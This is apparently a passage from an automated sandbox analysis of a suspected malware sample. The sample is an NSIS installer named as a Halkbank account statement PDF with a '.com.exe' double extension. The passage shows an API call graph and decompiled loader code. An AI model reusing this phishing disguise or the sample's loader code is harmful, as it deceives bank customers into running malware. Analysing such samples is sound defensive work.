4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                    C-Code - Quality: 78%
                                                                    			_entry_() {
                                                                    				WCHAR* _v8;
                                                                    				signed int _v12;
                                                                    				void* _v16;
                                                                    				signed int _v20;
                                                                    				int _v24;
                                                                    				int _v28;
                                                                    				struct _TOKEN_PRIVILEGES _v40;
                                                                    				signed char _v42;
                                                                    				int _v44;
                                                                    				signed int _v48;
                                                                    				intOrPtr _v278;
                                                                    				signed short _v310;
                                                                    				struct _OSVERSIONINFOW _v324;
                                                                    				struct _SHFILEINFOW _v1016;
                                                                    				intOrPtr* _t88;
                                                                    				WCHAR* _t92;
                                                                    				char* _t94;
                                                                    				void _t97;
                                                                    				void* _t116;
                                                                    				WCHAR* _t118;
                                                                    				signed int _t119;
                                                                    				intOrPtr* _t123;
                                                                    				void* _t137;
                                                                    				void* _t143;
                                                                    				void* _t148;
                                                                    				void* _t152;
                                                                    				void* _t157;
                                                                    				signed int _t167;
                                                                    				void* _t170;
                                                                    				void* _t175;
                                                                    				intOrPtr _t177;
                                                                    				intOrPtr _t178;
                                                                    				intOrPtr* _t179;
                                                                    				int _t188;
                                                                    				void* _t189;
                                                                    				void* _t198;
                                                                    				signed int _t204;
                                                                    				signed int _t209;
                                                                    				signed int _t214;
                                                                    				signed int _t216;
                                                                    				int* _t218;
                                                                    				signed int _t226;
                                                                    				signed int _t229;
                                                                    				CHAR* _t231;
                                                                    				char* _t232;
                                                                    				signed int _t233;
                                                                    				WCHAR* _t234;
                                                                    				void* _t250;
                                                                    
                                                                    				_t216 = 0x20;
                                                                    				_t188 = 0;
                                                                    				_v24 = 0;
                                                                    				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                    				_v20 = 0;
                                                                    				SetErrorMode(0x8001); // executed
                                                                    				_v324.szCSDVersion = 0;
                                                                    				_v48 = 0;
                                                                    				_v44 = 0;
                                                                    				_v324.dwOSVersionInfoSize = 0x11c;
                                                                    				if(GetVersionExW( &_v324) == 0) {
                                                                    					_v324.dwOSVersionInfoSize = 0x114;
                                                                    					GetVersionExW( &_v324);
                                                                    					asm("sbb eax, eax");
                                                                    					_v42 = 4;
                                                                    					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                    				}
                                                                    				if(_v324.dwMajorVersion < 0xa) {
                                                                    					_v310 = _v310 & 0x00000000;
                                                                    				}
                                                                    				 *0x42a318 = _v324.dwBuildNumber;
                                                                    				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                    				if( *0x42a31e != 0x600) {
                                                                    					_t179 = E00406A35(_t188);
                                                                    					if(_t179 != _t188) {
                                                                    						 *_t179(0xc00);
                                                                    					}
                                                                    				}
                                                                    				_t231 = "UXTHEME";
                                                                    				do {
                                                                    					E004069C5(_t231); // executed
                                                                    					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                                                    				} while ( *_t231 != 0);
                                                                    				E00406A35(0xb);
                                                                    				 *0x42a264 = E00406A35(9);
                                                                    				_t88 = E00406A35(7);
                                                                    				if(_t88 != _t188) {
                                                                    					_t88 =  *_t88(0x1e);
                                                                    					if(_t88 != 0) {
                                                                    						 *0x42a31c =  *0x42a31c | 0x00000080;
                                                                    					}
                                                                    				}
                                                                    				__imp__#17();
                                                                    				__imp__OleInitialize(_t188); // executed
                                                                    				 *0x42a320 = _t88;
                                                                    				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                                                    				E00406668(0x429260, L"NSIS Error");
                                                                    				_t92 = GetCommandLineW();
                                                                    				_t232 = L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
                                                                    				E00406668(_t232, _t92);
                                                                    				_t94 = _t232;
                                                                    				_t233 = 0x22;
                                                                    				 *0x42a260 = 0x400000;
                                                                    				_t250 = L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
                                                                    				if(_t250 == 0) {
                                                                    					_t216 = _t233;
                                                                    					_t94 =  &M00435002;
                                                                    				}
                                                                    				_t198 = CharNextW(E00405F64(_t94, _t216));
                                                                    				_v16 = _t198;
                                                                    				while(1) {
                                                                    					_t97 =  *_t198;
                                                                    					_t251 = _t97 - _t188;
                                                                    					if(_t97 == _t188) {
                                                                    						break;
                                                                    					}
                                                                    					_t209 = 0x20;
                                                                    					__eflags = _t97 - _t209;
                                                                    					if(_t97 != _t209) {
                                                                    						L17:
                                                                    						__eflags =  *_t198 - _t233;
                                                                    						_v12 = _t209;
                                                                    						if( *_t198 == _t233) {
                                                                    							_v12 = _t233;
                                                                    							_t198 = _t198 + 2;
                                                                    							__eflags = _t198;
                                                                    						}
                                                                    						__eflags =  *_t198 - 0x2f;
                                                                    						if( *_t198 != 0x2f) {
                                                                    							L32:
                                                                    							_t198 = E00405F64(_t198, _v12);
                                                                    							__eflags =  *_t198 - _t233;
                                                                    							if(__eflags == 0) {
                                                                    								_t198 = _t198 + 2;
                                                                    								__eflags = _t198;
                                                                    							}
                                                                    							continue;
                                                                    						} else {
                                                                    							_t198 = _t198 + 2;
                                                                    							__eflags =  *_t198 - 0x53;
                                                                    							if( *_t198 != 0x53) {
                                                                    								L24:
                                                                    								asm("cdq");
                                                                    								asm("cdq");
                                                                    								_t214 = L"NCRC" & 0x0000ffff;
                                                                    								asm("cdq");
                                                                    								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                                                    								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                                                    								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                                                    									L29:
                                                                    									asm("cdq");
                                                                    									asm("cdq");
                                                                    									_t209 = L" /D=" & 0x0000ffff;
                                                                    									asm("cdq");
                                                                    									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                                                    									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                                                    									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                                                    										L31:
                                                                    										_t233 = 0x22;
                                                                    										goto L32;
                                                                    									}
                                                                    									__eflags =  *_t198 - _t229;
                                                                    									if( *_t198 == _t229) {
                                                                    										 *(_t198 - 4) = _t188;
                                                                    										__eflags = _t198;
                                                                    										E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t198);
                                                                    										L37:
                                                                    										_t234 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                                    										GetTempPathW(0x400, _t234);
                                                                    										_t116 = E0040360F(_t198, _t251);
                                                                    										_t252 = _t116;
                                                                    										if(_t116 != 0) {
                                                                    											L40:
                                                                    											DeleteFileW(L"1033"); // executed
                                                                    											_t118 = E004030D0(_t254, _v20); // executed
                                                                    											_v8 = _t118;
                                                                    											if(_t118 != _t188) {
                                                                    												L68:
                                                                    												ExitProcess(); // executed
                                                                    												__imp__OleUninitialize(); // executed
                                                                    												if(_v8 == _t188) {
                                                                    													if( *0x42a2f4 == _t188) {
                                                                    														L77:
                                                                    														_t119 =  *0x42a30c;
                                                                    														if(_t119 != 0xffffffff) {
                                                                    															_v24 = _t119;
                                                                    														}
                                                                    														ExitProcess(_v24);
                                                                    													}
                                                                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                    														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                    														_v40.PrivilegeCount = 1;
                                                                    														_v28 = 2;
                                                                    														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                                                    													}
                                                                    													_t123 = E00406A35(4);
                                                                    													if(_t123 == _t188) {
                                                                    														L75:
                                                                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                    															goto L77;
                                                                    														}
                                                                    														goto L76;
                                                                    													} else {
                                                                    														_push(0x80040002);
                                                                    														_push(0x25);
                                                                    														_push(_t188);
                                                                    														_push(_t188);
                                                                    														_push(_t188);
                                                                    														if( *_t123() == 0) {
                                                                    															L76:
                                                                    															E0040140B(9);
                                                                    															goto L77;
                                                                    														}
                                                                    														goto L75;
                                                                    													}
                                                                    												}
                                                                    												E00405CC8(_v8, 0x200010);
                                                                    												ExitProcess(2);
                                                                    											}
                                                                    											if( *0x42a27c == _t188) {
                                                                    												L51:
                                                                    												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                    												_v24 = E00403D17(_t264);
                                                                    												goto L68;
                                                                    											}
                                                                    											_t218 = E00405F64(L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
                                                                    											if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                                    												L48:
                                                                    												_t263 = _t218 - L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
                                                                    												_v8 = L"Error launching installer";
                                                                    												if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                                    													_t189 = E00405C33(__eflags);
                                                                    													lstrcatW(_t234, L"~nsu");
                                                                    													__eflags = _t189;
                                                                    													if(_t189 != 0) {
                                                                    														lstrcatW(_t234, "A");
                                                                    													}
                                                                    													lstrcatW(_t234, L".tmp");
                                                                    													_t219 = L"C:\\Users\\alfons\\Desktop";
                                                                    													_t137 = lstrcmpiW(_t234, L"C:\\Users\\alfons\\Desktop");
                                                                    													__eflags = _t137;
                                                                    													if(_t137 == 0) {
                                                                    														L67:
                                                                    														_t188 = 0;
                                                                    														__eflags = 0;
                                                                    														goto L68;
                                                                    													} else {
                                                                    														__eflags = _t189;
                                                                    														_push(_t234);
                                                                    														if(_t189 == 0) {
                                                                    															E00405C16();
                                                                    														} else {
                                                                    															E00405B99();
                                                                    														}
                                                                    														SetCurrentDirectoryW(_t234);
                                                                    														__eflags = L"C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                                                    														if(__eflags == 0) {
                                                                    															E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t219);
                                                                    														}
                                                                    														E00406668(0x42b000, _v16);
                                                                    														_t201 = "A" & 0x0000ffff;
                                                                    														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                    														__eflags = _t143;
                                                                    														_v12 = 0x1a;
                                                                    														 *0x42b800 = _t143;
                                                                    														do {
                                                                    															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                                                                    															DeleteFileW(0x420f08);
                                                                    															__eflags = _v8;
                                                                    															if(_v8 != 0) {
                                                                    																_t148 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
                                                                    																__eflags = _t148;
                                                                    																if(_t148 != 0) {
                                                                    																	E00406428(_t201, 0x420f08, 0);
                                                                    																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                                                                    																	_t152 = E00405C4B(0x420f08);
                                                                    																	__eflags = _t152;
                                                                    																	if(_t152 != 0) {
                                                                    																		CloseHandle(_t152);
                                                                    																		_v8 = 0;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															 *0x42b800 =  *0x42b800 + 1;
                                                                    															_t61 =  &_v12;
                                                                    															 *_t61 = _v12 - 1;
                                                                    															__eflags =  *_t61;
                                                                    														} while ( *_t61 != 0);
                                                                    														E00406428(_t201, _t234, 0);
                                                                    														goto L67;
                                                                    													}
                                                                    												}
                                                                    												 *_t218 = _t188;
                                                                    												_t221 =  &(_t218[2]);
                                                                    												_t157 = E0040603F(_t263,  &(_t218[2]));
                                                                    												_t264 = _t157;
                                                                    												if(_t157 == 0) {
                                                                    													goto L68;
                                                                    												}
                                                                    												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
                                                                    												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
                                                                    												_v8 = _t188;
                                                                    												goto L51;
                                                                    											}
                                                                    											asm("cdq");
                                                                    											asm("cdq");
                                                                    											asm("cdq");
                                                                    											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                    											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                    											while( *_t218 != _t204 || _t218[1] != _t167) {
                                                                    												_t218 = _t218;
                                                                    												if(_t218 >= L"\"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
                                                                    													continue;
                                                                    												}
                                                                    												break;
                                                                    											}
                                                                    											_t188 = 0;
                                                                    											goto L48;
                                                                    										}
                                                                    										GetWindowsDirectoryW(_t234, 0x3fb);
                                                                    										lstrcatW(_t234, L"\\Temp");
                                                                    										_t170 = E0040360F(_t198, _t252);
                                                                    										_t253 = _t170;
                                                                    										if(_t170 != 0) {
                                                                    											goto L40;
                                                                    										}
                                                                    										GetTempPathW(0x3fc, _t234);
                                                                    										lstrcatW(_t234, L"Low");
                                                                    										SetEnvironmentVariableW(L"TEMP", _t234);
                                                                    										SetEnvironmentVariableW(L"TMP", _t234);
                                                                    										_t175 = E0040360F(_t198, _t253);
                                                                    										_t254 = _t175;
                                                                    										if(_t175 == 0) {
                                                                    											goto L68;
                                                                    										}
                                                                    										goto L40;
                                                                    									}
                                                                    									goto L31;
                                                                    								}
                                                                    								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
